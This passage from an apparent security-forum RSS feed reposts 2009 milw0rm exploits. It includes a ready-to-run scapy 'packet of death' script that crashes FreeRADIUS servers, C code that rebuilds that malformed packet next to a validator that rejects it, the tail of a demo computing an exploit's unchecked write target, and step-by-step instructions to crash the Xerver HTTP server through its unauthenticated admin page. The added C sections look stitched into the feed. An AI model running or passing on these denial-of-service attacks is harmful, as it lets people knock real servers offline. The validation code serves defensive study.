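    printf("unchecked destination for the bogus message: 0x%08lx (neweip = 0x%08lx)\n",
           (unsigned long)slp_unchecked_dest(&bogus_msg, EXPLOIT_OFFSET),
           (unsigned long)EXPLOIT_OFFSET);
    printf("exploit chunk fits the announced length? %s\n",
           (uint64_t)EXPLOIT_OFFSET + EXPLOIT_PAYLOAD_LEN == EXPLOIT_TOTAL ? "yes" : "no");
    printf("checked copy of the exploit chunk -> %d\n",
           slp_process_chunk_checked(&bogus_msg, EXPLOIT_OFFSET,
                                     exploit_payload, EXPLOIT_PAYLOAD_LEN));
    slp_process_chunk_unchecked(&legit_msg, 0, legit_chunk, sizeof legit_chunk);
    printf("checked copy of a legit chunk at offset 0 -> %d, at offset 60 -> %d\n",
           slp_process_chunk_checked(&legit_msg, 0,  legit_chunk, sizeof legit_chunk),
           slp_process_chunk_checked(&legit_msg, 60, legit_chunk, sizeof legit_chunk));
    return 0;
}
```

Build with any C99 compiler and run it: the first line printed is the absolute address the unchecked copy would write to, which is exactly the offset the exploit chose, and the second line confirms that the chunk's length bookkeeping is internally consistent, which is why a size-only check is not a fix.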
<br />
Source: <a href='http://www.milw0rm.com/exploits/9615' class='bbc_url' title='External link' rel='nofollow external'>http://www.milw0rm.com/exploits/9615</a>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:35:29 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32229</guid>
	</item>
	<item>
		<title><![CDATA[Freeradius &#60; 1.1.8 Remote Packet Of Death Exploit (Cve-2009-3111)]]></title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32228</link>
		<description><![CDATA[<pre class='prettyprint'>
#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
	print("Usage: radius_killer.py &lt;radiushost&gt;&#092;n")
	sys.exit(1)

PoD=IP(dst=sys.argv&#91;1&#93;)/UDP(sport=60422,dport=1812)/ &#092;
	Radius(code=1,authenticator="&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99",id=180)/ &#092;
	RadiusAttr(type=69,value="",len=2)

send(PoD)

</pre><br />
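Added example, not from the original post or from the script's author, written in C since that is what a RADIUS server decodes packets in. rad_build_pod() lays out on the wire the datagram the scapy line above describes (Access-Request, id 180, a 0x99-filled authenticator, then one attribute of type 69, which is Tunnel-Password per RFC 2868, with Length 2 and an empty value), and rad_validate() is the attribute length check a decoder needs before it touches such a value. The benign and overrun packets, the function names and the per-type minimum lengths are constructed for this demonstration and are not FreeRADIUS code.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RADIUS_HDR_LEN        20     /* Code, Identifier, Length, Authenticator */
#define RADIUS_MAX_LEN        4096
#define ATTR_USER_NAME        1
#define ATTR_TUNNEL_PASSWORD  69     /* the type the script sends */

typedef enum {
    RAD_OK = 0,
    RAD_BAD_HEADER,      /* under 20 bytes, or Length inconsistent with the datagram */
    RAD_ATTR_TRUNCATED,  /* an attribute's Length runs past the end of the packet */
    RAD_ATTR_TOO_SHORT   /* an attribute's Length leaves no room for its mandatory fields */
} rad_verdict_t;

/* The datagram payload the scapy script emits:
 * Radius(code=1, id=180, authenticator="\x99"*16) / RadiusAttr(type=69, value="", len=2).
 * Returns bytes written, 0 if the buffer is too small. */
size_t rad_build_pod(uint8_t *out, size_t cap)
{
    const size_t total = RADIUS_HDR_LEN + 2;
    if (cap < total) return 0;
    out[0] = 1;                      /* Code: Access-Request */
    out[1] = 180;                    /* Identifier */
    out[2] = 0;
    out[3] = (uint8_t)total;         /* Length: scapy fills in 22 */
    memset(out + 4, 0x99, 16);       /* Request Authenticator */
    out[20] = ATTR_TUNNEL_PASSWORD;  /* Type 69 */
    out[21] = 2;                     /* Length 2: Type and Length only, zero Value octets */
    return total;
}

/* Minimum Length this validator accepts per type (constructed table). The types
 * RFC 2865 defines all carry at least one Value octet, so 3 is the floor;
 * Tunnel-Password (RFC 2868) carries Tag, two Salt octets and at least one
 * String octet, so its floor is 5. A Length of 2 is what the script sends. */
static uint8_t attr_min_len(uint8_t type)
{
    return type == ATTR_TUNNEL_PASSWORD ? 5 : 3;
}

rad_verdict_t rad_validate(const uint8_t *pkt, size_t pktlen, uint8_t *bad_type)
{
    if (bad_type) *bad_type = 0;
    if (pktlen < RADIUS_HDR_LEN) return RAD_BAD_HEADER;
    size_t declared = ((size_t)pkt[2] << 8) | pkt[3];
    if (declared < RADIUS_HDR_LEN || declared > RADIUS_MAX_LEN || declared > pktlen)
        return RAD_BAD_HEADER;        /* octets beyond Length are padding and ignored */
    size_t off = RADIUS_HDR_LEN;
    while (off < declared) {
        if (declared - off < 2) return RAD_ATTR_TRUNCATED;  /* not even Type + Length */
        uint8_t type = pkt[off], len = pkt[off + 1];
        if (bad_type) *bad_type = type;
        if (len > declared - off)     return RAD_ATTR_TRUNCATED; /* would read past the packet */
        if (len < attr_min_len(type)) return RAD_ATTR_TOO_SHORT; /* also rejects 0/1, so off always advances */
        off += len;
    }
    if (bad_type) *bad_type = 0;
    return RAD_OK;
}

/* Type of the first offending attribute, 0 if the packet is clean. */
uint8_t rad_first_bad_attr(const uint8_t *pkt, size_t pktlen)
{
    uint8_t t = 0;
    rad_validate(pkt, pktlen, &t);
    return t;
}

/* Constructed benign Access-Request: User-Name "bob" plus a well-formed
 * Tunnel-Password (tag 0, salt 0xabcd, one String octet). Length 31. */
static const uint8_t benign_packet[] = {
    0x01, 0x01, 0x00, 0x1f,
    0x11,0x11,0x11,0x11,0x11,0x11,0x11,0x11, 0x11,0x11,0x11,0x11,0x11,0x11,0x11,0x11,
    ATTR_USER_NAME, 0x05, 'b', 'o', 'b',
    ATTR_TUNNEL_PASSWORD, 0x06, 0x00, 0xab, 0xcd, 0x5a
};
/* Constructed packet whose only attribute claims 7 bytes when 5 remain. Length 25. */
static const uint8_t overrun_packet[] = {
    0x01, 0x02, 0x00, 0x19,
    0x11,0x11,0x11,0x11,0x11,0x11,0x11,0x11, 0x11,0x11,0x11,0x11,0x11,0x11,0x11,0x11,
    ATTR_USER_NAME, 0x07, 'b', 'o', 'b'
};
static uint8_t pod_wire[RADIUS_HDR_LEN + 2];

static const char *verdict_str(rad_verdict_t v)
{
    static const char *s[] = { "ok", "bad header", "attribute runs past packet",
                               "attribute too short for its type" };
    return s[v];
}

int main(void)
{
    size_t n = rad_build_pod(pod_wire, sizeof pod_wire);
    printf("packet of death (%zu bytes): %s (type %u)\n", n,
           verdict_str(rad_validate(pod_wire, n, NULL)), rad_first_bad_attr(pod_wire, n));
    printf("benign request: %s\n", verdict_str(rad_validate(benign_packet, sizeof benign_packet, NULL)));
    printf("overlong attribute: %s (type %u)\n",
           verdict_str(rad_validate(overrun_packet, sizeof overrun_packet, NULL)),
           rad_first_bad_attr(overrun_packet, sizeof overrun_packet));
    return 0;
}
```

The order of the two checks inside the loop matters: the overrun test (Length past the end of the packet) has to come before anything reads the Value, and the per-type minimum has to be enforced before the Value is handed to a decoder that assumes a tag and salt are present, which is the assumption a zero-length Tunnel-Password violates.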
<br />
Source: <a href='http://www.milw0rm.com/exploits/9642' class='bbc_url' title='External link' rel='nofollow external'>http://www.milw0rm.com/exploits/9642</a>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:34:23 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32228</guid>
	</item>
	<item>
		<title>Xerver Http Server 4.32 Remote Denial Of Service Vulnerability</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32227</link>
		<description><![CDATA[<pre class='prettyprint'>
#################################################################################
#                                                                   	     	#
# &#91;b&#93;Xerver HTTP Server &lt;= v4.32 Remote Denial of Service&#91;/b&#93;	 		        #
# Found By:	Dr_IDE				                                #
# Download:	http://www.j&#097;v&#097;script.nu/xerver                          	#
# Tested On:	Windows XPSP3                                            	#
#                                                                        	#
#################################################################################

- Description -

Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.

Xerver v4.32 is vulnerable to a remote denial of service through the following means.

Xerver ships with a web based configuration program, essentially making this DoS
remote if and when the Remote Setup is running.

The admin package runs on port 32123 and does not require any form of 
authentication to make changes to the server configuration.

- Bug -

If the HTTP Server port is set to any kind of letter combination, the server will
crash and cannot be restarted until the configuration file is manually edited to
remove the letters and put a number back (ie. 80).

- Example -

1. http://172.16.2.101:32123/?action=wizardStep1
2. Enter anything in the port field, "Dr_IDE"
3. Click Save and Continue

- Results - 

The server will crash hard, and you will be unable to restart it. You must edit the 
configuration file, Xerver2.cfg and replace the first line of the file with a Port
number.

- Note - 

I tried to make this a possible XSS attack but I couldn't manage. Perhaps someone 
else can figure it out.

Methods and variables of interest for this attack:

SubmitForm()
&#100;ocument.myForm.portNR.value="80" # default, any letters here would kill the server


</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:33:11 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32227</guid>
	</item>
</channel>
</rss>